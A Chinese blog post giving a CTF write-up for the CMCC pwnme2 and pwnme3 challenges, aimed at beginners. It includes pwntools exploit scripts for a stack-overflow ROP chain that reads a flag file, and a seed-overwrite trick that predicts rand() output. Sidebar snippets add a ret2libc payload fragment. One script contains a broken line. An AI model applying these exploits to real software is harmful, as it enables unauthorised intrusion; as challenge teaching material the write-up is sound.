pwnme2和pwnme3的wp

最新推荐文章于 2024-01-31 14:40:58 发布
最新推荐文章于 2024-01-31 14:40:58 发布
阅读量1.4k 收藏
点赞数
分类专栏: ctf的wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/78242268
版权

这两个题目是cmcc的比赛,比较有意思,我把pwn的wp发出来,供大家学习,我会写的稍微详细一点,方便新手学习
pwnme2的下载地址是http://download.csdn.net/download/niexinming/10021147
题目要求:

Task:
溢出,操控按顺序执行函数,读取到flag文件即可...
题目地址:nc 104.224.169.128 18887

把pwnme2直接拖入ida中
main函数:
image
userfunction函数
image
先运行一下程序看一下这个程序干了啥
image
再看看程序开启了哪些保护:
image
看到NX enabled是开启了栈不可执行,这时ROP就有应用空间了

在程序里面可以看到strcpy这个函数,所以这里会造成栈溢出漏洞,经过简单的探测,可以发现只要输入116个a就刚刚好覆盖到函数的返回值,经过观察我发现里面有个函数exec_string
image
可以利用这个函数读取服务器的flag,但是string没有值,可以点击string来查看string在哪里
image
可以看到string在.bss段偏移+0x20的地方,我马上就想到,可以用gets(.bss+0x20)把flag在服务器的绝对地址写入到.bss+0x20里面,然后再调用exec_string,然后就可以读出flag的值了,通过add_home和add_flag这两个函数知道flag在/home/.flag1里面,所以我写的exp是这样的 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

def debug(addr = '0x080486f6'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)

shellcode="/home/.flag1"

elf = ELF('/home/h11p/hackme/pwnme2')
exec_string=elf.symbols['exec_string']
print "%x" % exec_string
scanf_addr = elf.symbols['gets']
print "%x" % scanf_addr
bss_addr = elf.bss()
print "%x" % bss_addr
offset = 0x70

#io = process('/home/h11p/hackme/pwnme2')

io = remote('104.224.169.128', 18887)

payload = 'A' * offset
payload += p32(scanf_addr)     #溢出后调用gets函数
payload += p32(exec_string)    #调用完gets函数后再调用exec_string
payload += p32(bss_addr+0x20)     #传入.bass+0x20

#debug()
io.sendline(payload)
io.sendline(shellcode)

io.interactive()

io.close()

看一下效果
image
可以看到已经完美的读取到flag的值

另附另一个师傅写的exp,我觉得很不错 

from pwn import *

#junk + p32(addhome) + p32(pop_ret) + arg1 + p32(addflag) + p32(pop_pop_ret) + arg2 + arg1 + p32(exec)
#ROPgadget --binary ./pwnme2 --only "pop|ret"

context(arch='i386', os='linux', log_level='debug')

def debug(addr = '0x080486f6'):
    raw_input('debug:')
    gdb.attach(r, "b *" + addr)

#r = process('/home/h11p/hackme/pwnme2')
r = remote('104.224.169.128', 18887)


elf = ELF('/home/h11p/hackme/pwnme2')
add_home_addr = elf.symbols['add_home']
add_flag_addr = elf.symbols['add_flag']
exec_str_addr = elf.symbols['exec_string']

pop_ret = 0x08048680
#pop_ret = 0x08048409
pop_pop_ret = 0x0804867f

payload = cyclic(0x6c)
payload += cyclic(0x04)
a1==0x0DEADBEEFh
payload += p32(add_home_addr) + p32(pop_ret) + '\xef\xbe\xad\xde'#add_home

#a1 == 0xCAFEBABE && a2 == 0xABADF00D
payload += p32(add_flag_addr) + p32(pop_pop_ret)  + '\xbe\xba\xfe\xca' + '\x0d\xf0\xad\xab'#add_flag

payload += p32(exec_str_addr)
#debug()
r.recvuntil('Please input:', drop=True)
r.sendline(payload)
print r.recvall()

这个exp分别调用add_home和add_flag这个函数,首先看add_home这个函数
image
通过这个函数可以看到传递进入这个函数的a2这个参数要等于0x0DEADBEEF才能在&string中写入/home,也就是在.bss+0x20里面写入/home,然后调用pop ebp;ret;(0x08048680)目的是把最开始传入的参数弹出栈,然后再调用add_flag这个函数
再看add_flag这个函数:
image
同理在add_flag这个函数中也是一样的,只不过add_flag判断的值是两个参数a1 == 0xCAFEBABE && a2 == 0xABADF00D,add_flag函数的作用是往/home后面添加/.flag1这个字符串,调用完add_flag这个函数之后用pop edi;pop ebp;ret;(0x0804867f)把参数弹出栈,最后调用exec_string,此时&string中的值就会由空变成/home/.flag了,此时exec_string就会读出flag的内容
讲完pwmme2下面开始讲pwnme3,pwnme3的下载地址是http://download.csdn.net/download/niexinming/10021157,这个题目很有意思
题目要求:

Task:
猜中100次随机数即可得到想要的...
题目地址:nc 104.224.169.128 18885

把pwnme3直接拖入ida中
main函数:
image
如果成功的猜对100个随机数,那么就可以进入sub_804876C这个函数:
image
这个函数就是读取flag文件并输出
先运行一下程序看一下这个程序干了啥
image

这程序先要输入一个1,然后输入name,然后输入要猜的数字
诈一看这个程序似乎没有什么漏洞,输入name的地方有42个字符的限制,远远达不到覆盖函数返回值的地方,后来经过M4x师傅的提醒,这个题目的是覆盖随机数的种子达到使随机数可预测的方式来拿到flag
我先输入42个a,看看随机数的种子会不会被覆盖
image
运行到srand函数后下断点,然后发现随机数种子确实被覆盖成0x61616161了,这样的话就可以根据逆向的结果写个程序来预测之后100个随机数了 

#include<stdio.h>
#include<stdlib.h>
int main() {
    int i;
    int v14,v13,v12;

    srand(0x61616161);
    for (i = 0; i <= 99; ++i)
    {

        v14 = rand();
        srand(v14);

        v13 = rand() % 0x1869Fu + 1;
        printf("%d\n", v13);
    }
}

注意,这个程序编译的时候只能在Linux用gcc编译,不能用win下的visual studio编译,随机数的生成也不能用python来模拟
这样生成100个随机数之后写入到一个文件里面,然后用pwntool不断的发送数字就能拿到flag
我都exp: 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

def debug(addr = '0x08048968'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)

shellcode="/home/flag"
#  print disasm(shellcode)

offset = 0x2a

#io = process('/home/h11p/hackme/pwnme3')

io = remote('104.224.169.128', 18885)

payload ="a"*42

#debug()
io.recvuntil('Are you sure want to play the game?\n')
io.sendline('1')
io.recvuntil('Input your name :')
io.sendline(payload)
with open('rand.txt','r') as file:
    for line in file:
        io.recvuntil('Init random seed OK. Now guess :')
        io.sendline(line)
#io.sendline(shellcode)

io.interactive()
#resp = io.recvn(4)
#myread = u32(resp)
#print myread
io.close()

image

niexinming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cmcc pwnme2
pondzhang的专栏
12-25 307
from pwn import * #p = process('./pwnme2') p = remote("node3.buuoj.cn",26522) libc = ELF('./libc-2.23.so') plt_puts = 0x08048490 got_puts = 0x0804A028 main = 0x080486F8 payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_puts) + p32(main) + p32(got_puts).
pwnme2题目
10-14
cmcc搞的ctf的pwnme2题目的文件,感兴趣的同学可以下载来玩玩
cmcc_pwnme2
z1r0的博客
12-29 681
cmcc_pwnme2 查看保护 直接用的ret2libc。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27722) else: r = process(file_name) elf = ELF(file_name) def dbg():
PWN练习网站
GJQI12的专栏
04-10 2125
1.什么是PWF CTF比赛主要表现以下几个技能上:逆向工程、密码 学、ACM编程、Web漏洞、二进制溢出、网络和取证等。在国际CTF赛事中,二进制溢出也称之为PWN。 PWN是一个黑客语法的俚语词,自"own"这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的 情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被...
攻防世界_pwn_CGfsb(萌新版)-pwnme解惑
TedLau的博客
02-24 517
首发于鄙人博客:传送门 0x00 前言 格式化字符串漏洞。 file checksec结果如下所示: NX打开,就是说堆栈不可执行。 PIE未打开,也就是说,我们在ida中国所看到的就是函数地址在运行过程中的地址。 0x10 步骤 0x11 main函数 在main函数中,我们可以发现printf函数的用法与我们平时使用C语言的习惯不同,这样的用法会给系统...
Killw3wp.exe
04-20
对于IIS 管理员来说,经常会碰到 Web 服务器 CPU 占用 100% 的情况,w3wp.exe是IIS工具的一部。w3wp.exe是在IIS(因特网信息服务器)与应用程序池相关联的一个进程,如果你有多个应用程序池,就会有对应的多个w3wp.exe...
w3wp.exe占用CPU和内存问题过高的解决方法
09-30
标题中的“w3wp.exe占用CPU和内存问题过高的解决方法”是指在Windows 2003 Server操作系统中,IIS 6.0 Web服务环境中,w3wp.exe进程(代表IIS工作进程)出现资源占用过高,导致服务器性能下降的情况。这可能是由于...
IIS w3wp.exe
10-28
通过查看事件查看器(Event Viewer)中的应用程序和服务日志,可以获取关于w3wp.exe错误和警告的信息。此外,IIS还提供了详细的日志记录功能,可以记录HTTP请求和响应的详细信息,以便分析和诊断问题。 5. **安全...
wp2pcs百度网盘
01-10
wP2PCS把你的WordPress和百度个人云存储(百度网盘)联系在一起,将百度网盘作为你的网站后备箱,你可以将WordPress备份到百度云,可以把图片放在百度云,可以利用百度云为你的网站提供下载,利用云存储随时随地同步...
华三H3C WP2024 POE交换机PSE版本210文件
01-11
华三H3C WP2024 POE交换机PSE版本210文件,用于解决端口异常断电、无法供电等问题。
pwnme1题目
09-30
pwnme1的题目,这个是一个简单的栈溢出的题目
[BUUCTF]-PWN:cmcc_pwnme2解析
最新发布
2301_79326813的博客
01-31 243
保护ida。
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2551
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
攻防世界hello pwn WPpwn入门基础题)
m0_62584974的博客
11-21 2038
攻防世界hello pwn WPpwn入门基础题)的简单讲解
2022强网杯pwn部分wp
N1rvana的博客
08-02 1495
2022强网杯pwn
祥云杯部分pwn的wp
eeeeeight的博客
08-24 1224
lemon 主要问题是2.26版本下, 未控制好指针导致任意写 数据结构如下: lemon_name: lemon_content: 主要可利用的函数是color: 里的buf是指lemon_name结构, 所以可以控制指针lemon_addr的指向了, 因为只能用一次所以想控制整个tcache结构 其它一点可利用的函数: 开头的一次welcome: 虽然是有rand, 但无随机数种子, 所以是固定值, z3一把????! eat函数: 可以打印chunkaddr第四字节, 用于配合后面分配堆块 整
Wordpress 4.6 任意命令执行漏洞
锋刃科技的博客
06-12 4829
1、简介 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 2、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 3、环境搭建 我们这里使用vulhub和docker搭建环境 cd vulhub/wordpress/pwnscriptum docker-compose build docke
湖湘杯-RE-replace
WocW的博客
11-19 1015
文件拖入PEID,查看到UPX壳,使用UPXSHELL进行脱壳。 然后使用IDA打开. 进入main函数,F5反编译。 main函数里的流程是输入一个长度不大于38的字符串,然后进行处理。 进入sub_401090函数。 阅读流程得: 得知flag长度为35,用byte_402150处的字符串每两个一组进行处理 得到V8与V9。 然后进行相关运算比对,35个字符全部验证完后即...
2020SCTF PWN部分wp
starssgo的博客
07-06 958
人在楼顶,感觉良好。 目前的自己还是只能做一些常规的Liunx下的PWN题,对其他的我就是个废物了。 这里写目录CoolCodesnake总结 CoolCode 这个题主要是shellcode非常的难构造。 比赛的时候whali3n51大师傅做出来的,我只是复现了他的payload。 本题目沙盒只剩下了0,1,5,9四个函数调用。 当我们想构造ORW的时候,没有open函数怎么办。 这个时候我们知道5在32位下是open。 那么我们考虑用retfq修改cs寄存器从而修改运行模式。 具体参考:https:/
限制操作 killw3wp
12-30
killw3wp 是一种用于终止运行中的 w3wp.exe 进程的命令。w3wp.exe 是由 IIS (Internet Information Services) 使用的工作进程进程,它负责处理和执行网站上的请求。无论是在开发环境还是生产环境中,都需要小心操作 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值